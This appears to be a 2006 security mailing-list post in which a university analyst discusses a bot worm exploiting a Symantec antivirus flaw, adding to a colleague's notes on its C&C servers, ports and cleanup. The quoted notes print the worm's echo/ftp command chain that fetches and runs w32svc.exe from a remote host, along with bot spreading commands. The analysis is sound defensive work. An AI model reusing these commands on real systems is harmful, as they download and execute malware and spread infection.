[unisog] Worm exploiting Symantec client defect?????

Brian Eckman eckman at umn.edu
Mon Nov 27 23:41:24 GMT 2006


We might have a slightly different variant, because I've seen some
differences in activity related to this. I'll send out a slightly edited
version of what I sent out here to internal staff in just a few...

Cam Beasley wrote:
> - a reptile bot it seems

Yup.

> - uses VMware and debugger detection
> - IRC Based C&C with a modified version of UnrealIRCD
> - Ops go by god and G00D
> - the botnet controller was at 38.118.143.201:6667
>   but just recently jumped to 64.143.184.7:6667

The C&C is www.flackware.info:6667/tcp. Those IP addresses were what
that RR resolved to at given points in time.

> - initial attack vectors target tcp/2967 & tcp/6236

2967/tcp I can confirm. 6236/tcp is involved, but a packet capture
showed an infected host running a cmd.exe shell on that port, so I think
that this isn't "attacking" folks via that port, per se.

> - compromised hosts participate in a NetBIOS & VNC scan of
>   local networks

I haven't seen this activity. I suspect the ones that were seen doing
this were told to do so by the C&C, and that our infections took place
at a time where the C&C was giving different instructions.

> - common bot commands are:
>   .asc -S -s
>   .asc mass445 100 5 0 -b -r -e -h
>   .asc rtvscan 100 5 0
> - malcode is transferred thusly:
>   echo open X.X.X.X 2100  >  i&echo user 1 1  >  >  i
>   &echo get w32svc.exe  >  >  i &echo quit  >  >  i &ftp
>   -As:i &w32svc.exe &exit
> - w32svc.exe is dumped to C:\Program Files\Symantec AntiVirus

w32svc.exe may have been dumped there (the cmd.exe shell bound to
6236/tcp that I saw had C:\Program Files\Symantec AntiVirus as the
working directory), but I've been seeing it installed to %WINDIR%. It is
then removed from the initial location.

> - Symantec wasn't identifying the malcode 'w32svc.exe' the
>   last time i checked..

The Rapid Release defs released before this post do detect it and do a
wonderful job of removal. The defs are 11/27/2006 rev.50.

Thanks for pointing this out Cam!

Brian
-- 
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance


More information about the unisog mailing list